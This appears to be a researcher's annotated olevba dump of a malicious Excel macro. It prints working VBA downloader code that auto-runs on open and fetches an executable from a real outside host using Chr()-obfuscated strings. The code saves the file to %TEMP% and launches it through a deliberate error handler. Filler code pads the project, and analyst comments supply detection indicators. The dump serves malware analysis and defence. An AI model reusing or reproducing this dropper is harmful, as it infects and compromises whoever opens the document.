dynamoo

Malicious Excel macro

Oct 7th, 2015
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V virus.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: virus.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ЭтаКнига.cls
  13. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Auto-exec entry point (olevba flags it AutoExec). This stream is named
' \u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430 = "ЭтаКнига", the Russian-locale
' name of Excel's ThisWorkbook module, so despite the .doc filename this is an
' Excel workbook and the macro fires as soon as it is opened with macros enabled.
' The literal 987 is discarded by the callee. Everything observable happens in
' IndentStringToVob (HTTP download -> write to %TEMP% -> launch); from a
' detection standpoint the tell-tales are EXCEL.EXE making an outbound HTTP
' request and then starting a process from the user's temp folder.
Sub Workbook_Open()

GetFolderStartAndUp (987)
End Sub
' Thin indirection between the auto-exec handler and the payload.
' Clears blnSessionBegunRunRun (declared in Module2), the flag that makes
' SplitXMLStringAndNot skip CreateObject, and then starts the download chain.
' subMain is never read.
Sub GetFolderStartAndUp(subMain As Long)
blnSessionBegunRunRun = False
IndentStringToVob
End Sub
  23. -------------------------------------------------------------------------------
  24. VBA MACRO Лист1.cls
  25. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  26. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  27. (empty macro)
  28. -------------------------------------------------------------------------------
  29. VBA MACRO Лист2.cls
  30. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  31. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  32. (empty macro)
  33. -------------------------------------------------------------------------------
  34. VBA MACRO Лист3.cls
  35. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  36. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  37. (empty macro)
  38. -------------------------------------------------------------------------------
  39. VBA MACRO Class1.cls
  40. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  41. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  42. (empty macro)
  43. -------------------------------------------------------------------------------
  44. VBA MACRO Module1.bas
  45. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  46. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Registry-value enumerator pasted from a Vietnamese-commented registry viewer.
' It appears to be inert padding: the API member names are split with dots
' (`C.RegOpenKeyEx`, `RegOpe.nKeyEx`, `RegEnu.mValue`, `Da.ta(0)`, `RegC.loseKey`
' in the sibling function), so these lines are not real Win32 calls; the
' REG_* constants, hKey, RetVal, NameKey and Index are never declared in any
' dumped module; and nothing in the dumped project calls GetKeyValue.
' Note also that Index is never advanced inside the Do loop (the increment is
' in ntegerccCLongue), so the loop as written could not terminate.
' Comments in the body are translated from the original Vietnamese.
Public Function GetKeyValue(FullKeyName)
xTotalStartUp = 0
Dim Key1, Key2, i, Ua
Ua = 10
' Split "HIVE\sub\key" at the first backslash into Key1 (hive name) and Key2 (subkey)
For i = 1 To Len(FullKeyName)
    If Mid(FullKeyName, i, 1) = "\" Then
        Ua = Ua + 10
        If Ua = 20 Then
            Key1 = Left(FullKeyName, i - 1)
            Key2 = Right(FullKeyName, Len(FullKeyName) - i)
        End If
    End If
Next i
'frmMain.Cls
If Key1 = "HKEY_LOCAL_MACHINE" Then
RetVal = C.RegOpenKeyEx(HKEY_LOCAL_MACHINE, Key2, 0, KEY_ALL_ACCESS, hKey)
ElseIf Key1 = "HKEY_CURRENT_USER" Then
RetVal = RegOpe.nKeyEx(HKEY_CURRENT_USER, Key2, 0, KEY_ALL_ACCESS, hKey)
End If

Index = 0
Do While RetVal = 0
    NameKey = Space(255)
    DataString = Space(255)
    LenName = 255
    DataLen = 255
    RetVal = RegEnu.mValue(hKey, Index, NameKey, LenName, 0, lpType, Da.ta(0), DataLen)
    If RetVal = 0 Then
        NameKey = Left(NameKey, LenName) 'Trim the trailing padding
       DataString = ""
' Process the value according to its type and put the result into DataString
       Select Case lpType
             Case REG_SZ
                For i = 0 To DataLen - 1
                    DataString = DataString & Chr(Da.ta(i)) ' Join the characters into a string
               Next
             Case REG_BINARY
                For i = 0 To DataLen - 1
                    Dim temp As String
                    temp = Hex(Da.ta(i))
                    If Len(temp) < 2 Then temp = String(2 - Len(temp), "0") & temp
                    DataString = DataString & temp & " "
 ' Join the two-digit hex byte pairs together
               Next
            Case REG_DWORD
                For i = DataLen - 1 To 0 Step -1
                    DataString = DataString & Hex(Da.ta(i)) 'Join the hex digits together
               Next

            Case REG_MULTI_SZ
                For i = 0 To DataLen - 1
                    DataString = DataString & Chr(Da.ta(i))
    'Join the characters, including vbNullChar (the line separator), into one string; an array of strings could be used instead of a single one
               Next
            Case REG_EXPAND_SZ
                For i = 0 To DataLen - 2
                    DataString = DataString & Chr(Da.ta(i))
    'Join the characters, dropping the trailing NULL
               Next
            Case Else
                DataString = " Khong xac dinh duoc !"
        ' The above are the 5 value types found on WinXP
       End Select
    End If
    Loop
    End Function
' Writes the downloaded bytes to disk. The Chr()-and-punctuation-padded
' argument to SplitXMLStringAndNot reads "Ad(odb*.)Strea+m" before the
' characters ( ) * + are stripped, i.e. it creates an ADODB.Stream.
' .Type = 1 is adTypeBinary. VariantNeVariant is the HTTP response body
' returned by RSPBDY; StringAsString is the drop path from GetTasNewUt.
' REGMULTISZ1 then performs the SaveToFile.
 Public Function ntegerLongue(VariantNeVariant As Variant, StringAsString As String)
Dim rimmaLongInteger As Object
Set rimmaLongInteger = SplitXMLStringAndNot(Chr(65) & Chr(100) + "(" & Chr(111) & Chr(100) & "b*" & Chr(46) & ")S" & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "+m")
rimmaLongInteger.Type = 1
With rimmaLongInteger
    .Open
    .write VariantNeVariant
End With
REGMULTISZ1 rimmaLongInteger, StringAsString
End Function
  123.  
  124.  
  125.  
' Second half of the registry-viewer code that GetKeyValue was cut from.
' Inert padding: NameKey, LenName, DataString, Index, Key1/Key2 and hKey are
' not declared in any dumped module, frmMain is not part of the dumped project,
' `RegC.loseKey` is a dot-split name rather than an API call, and nothing
' references ntegerccCLongue.
 Public Function ntegerccCLongue()
    If Left(Left(NameKey, LenName), 1) <> " " Then
    '///////////////////
   'Form1.List1.AddItem DataString

    With frmMain.LV
        Dim iu
        iu = .ListItems.Count + 1
        .ListItems.Add iu, , Left(NameKey, LenName)
        .ListItems(iu).SubItems(1).Caption = DataString
        .ListItems(iu).SubItems(2).Caption = Key1 & "\" & Key2 & "\" & Left(NameKey, LenName)
    End With
    '///////////////
   End If
    Index = Index + 1
    'frmMain.Print Left(NameKey, LenName) & "=" & DataString

RetVal = RegC.loseKey(hKey)
End Function
  145.  
' Returns the part of sPath after the last backslash (the whole string when
' there is none, since InStrRev then returns 0). Not referenced by any dumped
' module; filler carried along with the registry-viewer code.
Public Function GetFileName(ByVal sPath As String) As String
GetFileName = Mid(sPath, InStrRev(sPath, "\") + 1)
End Function
  149.  
' Download-and-execute driver, reached from Workbook_Open via GetFolderStartAndUp.
' Sequence: create Microsoft.XMLHTTP, assemble the download URL, open a GET
' (HIDRAfob), compute the drop path under %TEMP% (GetTasNewUt), send the request
' and fetch the body (RSPBDY), write it to the drop path (ntegerLongue), then
' force a division-by-zero so the On Error handler runs IniStringPrivateLong,
' which opens -- i.e. executes -- the dropped file. There is no error handler
' around the network and file steps, so a failed download stops the chain
' with a VBA runtime error before anything is written.
Public Sub IndentStringToVob()
Dim SplitIndexAsString As Object
' Padded ProgID "M++i(cr)osoft.*XML*HTTP" -> "Microsoft.XMLHTTP" after ( ) * + are stripped
Set SplitIndexAsString = SplitXMLStringAndNot(Chr(77) & "++" + Chr(105) & "(cr)" & Chr(111) & Chr(130 - 15) & Chr(100 + 11) & Chr(102) & "t" & Chr(46) & "*X" & Chr(77) & Chr(76) & "*H" & Chr(84) & "TP")
Dim SIDRa As String
Dim CHR20 As Integer
CHR20 = 20

' Download URL built one character at a time so it never appears intact in the
' file. Decoded (defanged): hxxp://alarmtechcentral[.]com/fw43t2d/98kj6.exe
' -- treat host and path as indicators for blocking and hunting.
SIDRa = Chr(104) & "t" & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(97) & "l" & Chr(97) & Chr(114) & Chr(109) & Chr(116) & Chr(101) & Chr(99) & "h" & Chr(99) & Chr(101) & Chr(110) & "t" & "r" & "a" & Chr(108) & "." & Chr(99) & Chr(111) & Chr(109) & "/" & "f" & "w" & Chr(52) & "3" & "t" & "2" & Chr(100) & "/" & Chr(57) & "8" & Chr(107) & "j" & "6" & Chr(46) & Chr(101) & Chr(120) & "e"
' Strips Chr(40)..Chr(43) = ( ) * + ; the URL above contains none, so this is a no-op here
For i = 1 To 4
SIDRa = Replace(SIDRa, Chr(20 * 2 + i - 1), "")
Next i


' Opens the synchronous GET on the XMLHTTP object (not yet sent)
HIDRAfob SplitIndexAsString, SIDRa


Dim LocaliseStringItem3() As Byte
' Module-level String (Module3): the drop path, %TEMP%\kah78d.ExE
ListItemsAndNot = GetTasNewUt()

' .Send, then the raw responseBody bytes
LocaliseStringItem3 = RSPBDY(SplitIndexAsString)

' ADODB.Stream write + SaveToFile to the drop path
ntegerLongue LocaliseStringItem3, ListItemsAndNot
' Deliberate runtime error: 889 / 0 raises "Division by zero", which jumps to
' LocaliseStringItem5 and launches the dropped file. Hiding the execution step
' inside an error handler is an obfuscation device, not a bug.
On Error GoTo LocaliseStringItem5
    A = 889 / 0
  On Error GoTo 0

IniStringPrivateInteger:
  Exit Sub
LocaliseStringItem5:
  ' Argument is ignored by the callee; the path comes from ListItemsAndNot
  IniStringPrivateLong ("VisokAndVisok")
Resume IniStringPrivateInteger
End Sub
' Returns sPath up to, but excluding, the last backslash. With no backslash
' InStrRev returns 0 and Left(sPath, -1) raises "Invalid procedure call".
' Not referenced by any dumped module.
Public Function GetFolderPath(ByVal sPath As String) As String
GetFolderPath = Left(sPath, InStrRev(sPath, "\") - 1)
End Function
  185.  
' Lists the Winlogon Shell and Userinit values in a ListView. Inert padding:
' it targets a frmMain form that is not part of the dumped project, the helper
' names are dot-split (`ToUnik.Code`, `GetS.tring`, `GetSt.ring`) so nothing is
' actually invoked, and no dumped module calls GetSystemKey. The second entry
' also addresses row iu without first adding it. The Winlogon paths here are
' only string literals; the registry is never touched by this sample.
Public Sub GetSystemKey()
    With frmMain.LV
        Dim iu
        iu = .ListItems.Count + 1
        .ListItems.Add iu, , ToUnik.Code("Shell [He65 Tho61ng]")
        .ListItems(iu).SubItems(1).Caption = GetS.tring(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
        .ListItems(iu).SubItems(2).Caption = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
        iu = .ListItems.Count + 1
        .ListItems(iu).SubItems(1).Caption = GetSt.ring(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit")
        .ListItems(iu).SubItems(2).Caption = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
    End With
End Sub
  198.  
' Lists the files in the all-users (sWhere = 1) or current-user Startup folder
' in a ListView. Inert padding from the same registry-viewer source: it needs a
' frmMain form with File1 and LV controls that is not part of the dumped
' project, and nothing calls GetFolderStartUp. Paths are hard-coded XP-era
' "Documents and Settings" locations; no persistence is created by this sample.
Public Sub GetFolderStartUp(sWhere)
With frmMain
    Dim j
    Dim o
If sWhere = 1 Then
    .File1.Path = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
    For j = 0 To .File1.ListCount - 1
        o = .LV.ListItems.Count + 1
        .LV.ListItems.Add o, , .File1.List(j)
        .LV.ListItems(o).SubItems(1).Caption = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & .File1.List(j)
        .LV.ListItems(o).SubItems(2).Caption = "---"
    Next j
Else
    .File1.Path = "C:\Documents and Settings\" & Environ$("USERNAME") & "\Start Menu\Programs\Startup"
    For j = 0 To .File1.ListCount - 1
        o = .LV.ListItems.Count + 1
        .LV.ListItems.Add o, , .File1.List(j)
        .LV.ListItems(o).SubItems(1).Caption = "C:\Documents and Settings\" & Environ$("USERNAME") & "\Start Menu\Programs\Startup\" & .File1.List(j)
        .LV.ListItems(o).SubItems(2).Caption = "---"
    Next j
End If
End With
End Sub
  222.  
' Opens the HTTP request on the XMLHTTP object created in IndentStringToVob.
' Chr(71) & Chr(69) & "T" spells "GET"; the third argument False makes the
' request synchronous. Replacing "??" with "//" is a no-op for the URL that
' IndentStringToVob builds (it contains no "??"). Nothing goes on the wire
' until RSPBDY calls .Send.
Public Function HIDRAfob(SplitIndexAsString As Object, SIDRa As String)

SplitIndexAsString.Open Chr(71) & Chr(69) & "T", Replace(SIDRa, "??", "//"), False
End Function
  227.  
  228.  
  229.  
  230.  
  231.  
  232. -------------------------------------------------------------------------------
  233. VBA MACRO Module2.bas
  234. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  235. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Module-level state. All but one of these belong to the QuickBooks (qbXMLRP)
' sample code below and are never used on the live path. The exception is
' blnSessionBegunRunRun: SplitXMLStringAndNot refuses to CreateObject while it
' is True, and GetFolderStartAndUp clears it before the download chain starts.
Public blnIsOpenConnection As Boolean
Public blnSessionBegun As Boolean
' Ticket
Public ticket As String

' Guard read by SplitXMLStringAndNot; cleared by GetFolderStartAndUp
Public blnSessionBegunRunRun As Boolean
' Request and response strings
Public requestXML  As String
Public responseXML As String
  245.  
  246.  
' Appears to be lifted from a QuickBooks SDK VB sample (the literal
' "IDN QuickBooks Sample Add Invoice" is the sample's app name). Inert padding:
' qbXMLRP and QBXMLRPLib are never created or declared in the dumped project,
' and nothing calls OpenConnection. Kept as dumped.
' Note the ErrHandler clears blnIsOpenConnection before testing it, so the
' CloseConnection branch of the handler can never run -- a defect in the
' sample, not something the payload depends on.
Public Function OpenConnection() As Boolean
'Open the connection
On Error GoTo ErrHandler

    If blnIsOpenConnection Then
        OpenConnection = True
        Exit Function
    End If


    blnSessionBegun = False
    blnIsOpenConnection = False

    ' Open connection to qbXMLRP COM
   qbXMLRP.OpenConnection "QBRAddEmp", "IDN QuickBooks Sample Add Invoice"
    blnIsOpenConnection = True
    ' Begin Session
   ' Pass empty string for the data file name to use the currently
   ' open data file.


    ticket = qbXMLRP.BeginSession("", QBXMLRPLib.qbFileOpenSingleUser)
    blnSessionBegun = True

    OpenConnection = True 'return that the connection was successful

    'Verifying which version of qbXML QuickBooks is supporting If you want to do a US/Canadian APP,
   'This is where you would find the version supported by QuickBooks.  You would modify the requests accordingly
   'to the version of QuickBooks
   Dim VersionSupportedArray() As String
    VersionSupportedArray = qbXMLRP.QBXMLVersionsForSession(ticket) ' This return an array of string containing all the version of qbXML
                                                           'supported by QuickBooks

    'Checking that QuickBooks support the Canadian SDK (version CA2.0)
   Dim strCanadianVersion As String
    Dim blnCanadianVersionFound As Boolean
    Dim str As Variant


'    Dim nArrayUpperBound As Integer


    strCanadianVersion = "CA2.0"
    blnCanadianVersionFound = False

    For Each str In VersionSupportedArray
        If strCanadianVersion = str Then
            blnCanadianVersionFound = True
        End If

    Next str

    If blnCanadianVersionFound = False Then 'If version CA 2.0 not found...
       MsgBox "This QuickBooks does not support the version CA2.0 of qbXML", , "qbXML version not supported"""
        If blnSessionBegun = True Then
            qbXMLRP.EndSession ticket
        End If
        ' Close the connection
       If blnIsOpenConnection = True Then
            blnIsOpenConnection = False
            qbXMLRP.CloseConnection
        End If
        OpenConnection = False

    End If


    Exit Function

ErrHandler:
    ' blnIsOpenConnection is cleared here, so the "Close the connection" test below is always False
    blnIsOpenConnection = False
    OpenConnection = False
    ' End the session
   If blnSessionBegun = True Then
        qbXMLRP.EndSession ticket
    End If
    ' Close the connection
   If blnIsOpenConnection = True Then
        qbXMLRP.CloseConnection
    End If
    MsgBox Err.Description, vbExclamation, "Error"
    Exit Function

End Function
  331.  
  332.  
' Counterpart of OpenConnection from the same QuickBooks sample; inert for the
' same reasons (qbXMLRP never exists in the dumped project, no caller).
Public Sub CloseConnection()
' Ends session and closes connection

If Not blnIsOpenConnection Then
        Exit Sub
End If

On Error GoTo ErrHandler

    If blnSessionBegun = True Then
        qbXMLRP.EndSession ticket
    End If
    ' Close the connection
   If blnIsOpenConnection = True Then
        qbXMLRP.CloseConnection
    End If

    Exit Sub

ErrHandler:
    MsgBox Err.Description, vbExclamation, "Error"
    Exit Sub

End Sub
  357.  
' Execution step, reached only through the error handler in IndentStringToVob.
' The padded ProgID "She(l)+l+.A*pp(l)ica+ti()on" becomes "Shell.Application"
' once ( ) * + are stripped, and .Open on ListItemsAndNot -- the %TEMP% drop
' path set by IndentStringToVob -- launches the downloaded executable.
' The parameter is never read. Detection: a child process of EXCEL.EXE started
' from the user's temp directory.
Public Function IniStringPrivateLong(ZRzNfTJSyBWpPu As String)
    Set IniLongPrivateInteger = SplitXMLStringAndNot("Sh" & Chr(101) & "(l)" & "+l+" & Chr(46) & Chr(65) & "*p" & Chr(112) & "(l)" & Chr(105) & Chr(99) & "a+t" + Chr(105) & "()" & Chr(111) + Chr(110))
IniLongPrivateInteger.Open (ListItemsAndNot)
End Function
  362.  
  363.  
  364. ' This subroutine is available for error checking.  It is sometimes
  365. ' useful to print the XML which QuickBooks returns to a file so that
  366. ' any problems can be uncovered easily.  Although this subroutine is
  367. ' not currently in use in the ReceievePayment sample code, it is
  368. ' encouraged that you add it in if you would like to see the precise
  369. ' XML that is being sent to or received from QuickBooks.
  370. '
' First half of the QuickBooks sample's XML pretty-printer; the printing loop
' was moved into SmthingWrongFunc. Inert padding: nothing calls it. As dumped
' it opens XMLFile for output and returns without ever closing FileNum.
Sub PrintXMLToFile(xmlString As String, XMLFile As String)

  Dim SplitXMLString() As String
  Dim IndentString As String
  Dim xmlStringLength As Long
  Dim SplitIndex

  IndentString = ""

  Dim FileNum
  FileNum = FreeFile
  Open XMLFile For Output As FileNum

  ' Remove the linefeeds from the XML output string
 xmlString = Replace(xmlString, vbLf, vbNullString)

  SplitXMLString = Split(xmlString, "<")

  ' We're expecting the first character of the XML output to be "<"
 ' which result in an empty first array element, so skip it.
 SplitIndex = LBound(SplitXMLString) + 1
  End Sub
' Sends the request prepared by HIDRAfob and returns the raw responseBody
' (the downloaded executable's bytes) as a Variant; IndentStringToVob stores it
' in a Byte array. The caller has no error handler active at this point, so a
' network failure presumably stops the chain here, before any file is written.
  Public Function RSPBDY(SomeBody As Object) As Variant
SomeBody.Send
RSPBDY = SomeBody.responseBody
End Function
' File-list loader pasted from an unrelated photo/document application. Inert
' padding: gstrMstDir, m_udtFileList, m_sParts, datDate and frmProgress are
' not declared in any dumped module, and nothing calls ReadFile. Its garbled
' section comments could not be recovered from the dump and are marked as such.
' The bare "Mid$(strReadData, 5, 2), ..." line below is an orphaned continuation
' of the commented-out statement above it -- as dumped it is not a valid
' statement, possibly a dump artefact, possibly deliberate.
Public Sub ReadFile( _
  strName As String, _
  strDate As String _
)

    Dim strMstDir As String
    Dim strClientName As String
    Dim strTargetdate As String
    Dim intCntPic As Integer

    strMstDir = gstrMstDir
    strClientName = strName

    If strDate <> vbNullString Then
        strTargetdate = strDate
    End If

''    Select Case frmSubForm.Name
''        Case "frmBasic"
           intCntPic = 13
''        Case "frmFP"
''            intCntPic = 3
''        Case "frmIOP"
''            intCntPic = 6
''    End Select

    Dim intIndex        As Integer
    ReDim m_udtFileList(intIndex)

    Dim strDirFile      As String, strLoadPicFile  As String

    Dim intFileHandle As Integer
    Dim strFilePath As String
    Dim strFileName As String
    Dim strReadHeader As String
    Dim strReadData As String

    strFilePath = gstrMstDir & "\" & strName
    strFileName = strFilePath & "\" & strDate & "T.txt"

    If strName = vbNullString Then Exit Sub
    If Dir(strFileName) = vbNullString Then Exit Sub

'/** (original comment unrecoverable from the dump) **/
   datDate = CDate(DateSerial(Left$(strDate, 4), _
                Mid$(strDate, 5, 2), Mid$(strDate, 7, 2)))

'// (original comment unrecoverable from the dump)
   m_sParts = vbNullString

'/** (original comment unrecoverable from the dump) **/
   intFileHandle = FreeFile()
    Open strFileName For Input As #intFileHandle

    ReDim Preserve m_udtFileList(intIndex)
    While Not EOF(intFileHandle)
        With m_udtFileList(intIndex)
            Input #intFileHandle, strReadHeader, strReadData
            Select Case strReadHeader
                Case "[Picture]"
                Case "[Document]"
                Case "[Shooting]"
                Case "NAME"
                    m_sParts = strReadData
                Case Else
                  If strReadData <> "" Then
                    .intFileNum = CInt(Right$(strReadHeader, 1))
                    .strClntName = strName
                    .strFileDate = Left$(strReadData, 8)

''                        datDate = CDate(DateSerial(Left$(strReadData, 4), _
                                Mid$(strReadData, 5, 2), Mid$(strReadData, 7, 2)))

                    .strFileName = strReadData
                    .strFileType = Left$(strReadHeader, 1)
                    strLoadPicFile = gstrMstDir & "\" & .strClntName & "\" & .strFileName

                    Call frmProgress.SetProgess((intIndex) / intCntPic * 100)

                    intIndex = intIndex + 1
                End If
            End Select
        End With

        ReDim Preserve m_udtFileList(intIndex)

    Wend

    Close #intFileHandle

DoEvents

End Sub
  490.  
' Obfuscation helper: strips the padding characters Chr(40)..Chr(43), i.e.
' "(", ")", "*" and "+", from InitiPrivateInteger and then creates the named
' COM object. Every ProgID in the payload goes through here (Microsoft.XMLHTTP,
' Adodb.Stream, WScript.Shell, Shell.Application), so none of them appears
' intact in the file -- detect on the CreateObject call pattern or on the
' resulting behaviour rather than on ProgID strings.
' If blnSessionBegunRunRun is True it returns without creating anything, and
' the caller's Set would then fail; GetFolderStartAndUp clears the flag first,
' so on the Workbook_Open path the guard never fires (presumably an
' anti-analysis device -- the intent is not visible here).
Public Function SplitXMLStringAndNot(InitiPrivateInteger As String)
For i = 1 To 4
InitiPrivateInteger = Replace(InitiPrivateInteger, Chr(20 * 2 + i - 1), "")
Next i
If blnSessionBegunRunRun Then
Exit Function
End If

    Set SplitXMLStringAndNot = CreateObject(InitiPrivateInteger)
End Function
' Second half of the QuickBooks sample's XML pretty-printer (the loop that
' PrintXMLToFile used to contain). Inert padding: the array name is dot-split
' in three different ways (`Splift.xmlString`, `SplitXM.LString`,
' `SplitX.MLString`), FileNum/IndentString/SplitIndex are locals of another
' procedure, and nothing calls SmthingWrongFunc.
  Public Function SmthingWrongFunc()
  Do
    If Left(Splift.xmlString(SplitIndex), 1) = "/" Then
      IndentString = Left(IndentString, Len(IndentString) - 3)
      Print #FileNum, IndentString & "<" & _
                      SplitXM.LString(SplitIndex)
      SplitIndex = SplitIndex + 1
    ElseIf Left(SplitXM.LString(SplitIndex + 1), 1) = "/" Then
      If InStr(1, _
               Left(SplitXM.LString(SplitIndex), _
                    InStr(1, SplitXM.LString(SplitIndex), ">")), _
                " ") > 0 Then
        Print #FileNum, IndentString & "<" & _
                        SplitXM.LString(SplitIndex)
        SplitIndex = SplitIndex + 1
      Else
        Print #FileNum, IndentString & "<" & _
                        SplitXM.LString(SplitIndex) & "<" & _
                        SplitXM.LString(SplitIndex + 1)
        SplitIndex = SplitIndex + 2
      End If
    Else
      Print #FileNum, IndentString & "<" & _
                      SplitXM.LString(SplitIndex)
      IndentString = IndentString & "   "
      SplitIndex = SplitIndex + 1
    End If
  Loop Until SplitIndex >= UBound(SplitX.MLString)

  If Left(SplitXM.LString(UBound(SplitX.MLString)), 1) = "/" Then
    IndentString = Left(IndentString, Len(IndentString) - 3)
  End If

  Print #FileNum, IndentString & "<" & _
                  SplitXM.LString(UBound(SplitXM.LString))

  Close FileNum
End Function
  539.  
  540.  
  541.  
  542.  
  543.  
  544. -------------------------------------------------------------------------------
  545. VBA MACRO Module3.bas
  546. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
  547. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  548.  
' Shared drop-file path: set by IndentStringToVob from GetTasNewUt
' (%TEMP%\kah78d.ExE) and consumed by IniStringPrivateLong, which opens it
' with Shell.Application.
Public ListItemsAndNot As String
' Maps a Windows code page to a GDI charset constant. Localisation code pasted
' as filler: only LoadLanguageList (itself uncalled) references it, and none of
' the *_CHARSET constants are declared in the dumped modules.
Public Function GetCharsetFromLng(lngCodePage As Long) As Long

    Dim lngCharset As Long

    Select Case lngCodePage

        Case 1251
            lngCharset = RUSSIAN_CHARSET

        Case 1250
            'EASTEUROPE_CHARSET = 238
           lngCharset = EASTEUROPE_CHARSET

        Case 1252
            'ANSI_CHARSET = 0
           lngCharset = ANSI_CHARSET

        Case 1253
            'GREEK_CHARSET = 161
           lngCharset = GREEK_CHARSET

        Case 1254
            'TURKISH_CHARSET = 162
           lngCharset = TURKISH_CHARSET

        Case 1255
            'HEBREW_CHARSET = 177
           lngCharset = HEBREW_CHARSET

        Case 1256
            'ARABIC_CHARSET = 178
           lngCharset = ARABIC_CHARSET

        Case 1257
            'BALTIC_CHARSET = 186
           lngCharset = BALTIC_CHARSET

        Case 1258
            'VIETNAMESE_CHARSET = 163
           lngCharset = VIETNAMESE_CHARSET

        Case 874
            lngCharset = THAI_CHARSET

        Case 932
            'SHIFTJIS_CHARSET = 128
           lngCharset = SHIFTJIS_CHARSET

        Case 949
            'HANGUL_CHARSET = 129
           lngCharset = HANGUL_CHARSET

        Case 936
            'GB2312_CHARSET = 134
           lngCharset = GB2312_CHARSET

        Case 950
            'CHINESEBIG5_CHARSET = 136
           lngCharset = CHINESEBIG5_CHARSET

        Case Else
            'DEFAULT_CHARSET = 1
           lngCharset = DEFAULT_CHARSET
    End Select

    GetCharsetFromLng = lngCharset
End Function
' Builds the drop path. "W(S+c)ri*pt.Shel))l" -> "WScript.Shell" after padding
' removal; .Environment("Process") exposes the process environment, from which
' the "TEMP" variable is read. The arithmetic yields Chr(69) = "E" and
' Chr(120) = "x", so uhu = "xE", and the result is %TEMP%\kah78d.ExE
' (e.g. C:\Users\<user>\AppData\Local\Temp\kah78d.ExE -- constructed example).
' The odd-case extension and the expression-built letters exist only to keep
' the filename out of simple string scans.
Public Function GetTasNewUt() As String
Set LocaliseStringItem0 = SplitXMLStringAndNot(Chr(87) & "(S+c)" & Chr(114) & Chr(105) & "*p" & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & "))l")

' Chr(80) & "r" & ... spells "Process"
Set LocaliseStringItem1 = LocaliseStringItem0.Environment(Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
Dim huh2 As Integer
huh2 = 25
Dim uhu As String
' 16 * Sqr(25) - 11 = 69 -> "E"
uhu = Chr(16 * Sqr(huh2) - 10 - 1)
' 180 - 60 = 120 -> "x", prepended: uhu = "xE"
uhu = Chr(180 - 30 * 2) + uhu
' Chr(84) & "E" & Chr(77) & Chr(80) = "TEMP"; the tail is "\kah78d.E" & "xE"
GetTasNewUt = LocaliseStringItem1(Chr(84) & "E" & Chr(77) & Chr(80)) + _
"\ka" & Chr(104) + "78d" & Chr(40 + 2 * 3) & Chr(70 - 1) + uhu

End Function
'!--------------------------------------------------------------------------------
'! Procedure   (Function)   :   Function GetUserLocaleInfo
'! Description              :   [type_description_here]
'! Variables                :   dwLocaleID (Long)
'                              dwLCType (Long)
'!--------------------------------------------------------------------------------
' (Header labels translated from cp1251 Russian rendered as mojibake.)
' Two-call GetLocaleInfo wrapper from a localisation library. Inert padding:
' the API and helper names are dot-split (`ss.GetLocaleInfo`, `s.FillNullChar`,
' `cs.GetLocaleInfo`, `sc.TrimNull`), so nothing is actually called; its only
' caller is LoadLanguageOS, which is itself unreferenced.
Public Function GetUserLocaleInfo(ByVal dwLocaleID As Long, ByVal dwLCType As Long) As String

    Dim sReturn As String
    Dim R       As Long

    'call the function passing the Locale type
   'variable to retrieve the required size of
   'the string buffer needed
   R = ss.GetLocaleInfo(dwLocaleID, dwLCType, sReturn, 0)

    'if successful..
   If R Then
        'pad the buffer with spaces
       sReturn = s.FillNullChar(R)
        'and call again passing the buffer
       R = cs.GetLocaleInfo(dwLocaleID, dwLCType, sReturn, Len(sReturn))

        'if successful (r > 0)
       If R Then
            'r holds the size of the string
           'including the terminating null
           GetUserLocaleInfo = sc.TrimNull(sReturn)
        End If
    End If

End Function
  662.  
'!--------------------------------------------------------------------------------
'! Procedure   (Function)   :   Function LoadLanguageList
'! Description              :   [Load the language list]
'! Variables                :
'!--------------------------------------------------------------------------------
' (Header and inline comments translated from cp1251 Russian rendered as mojibake.)
' Enumerates *.lng files and fills an arrLanguage table. Inert padding: the
' helpers are dot-split (`sc.SearchFilesInRoot`, `GetIn.iValueString`,
' `Pa.thCombine`), strFileList_x is declared as Integer() yet used with a
' .FullPath member, arrLanguage and the strPCLang* globals are not declared in
' any dumped module, and nothing calls LoadLanguageList.
Public Function LoadLanguageList() As Boolean

    Dim strFileList_x() As Integer
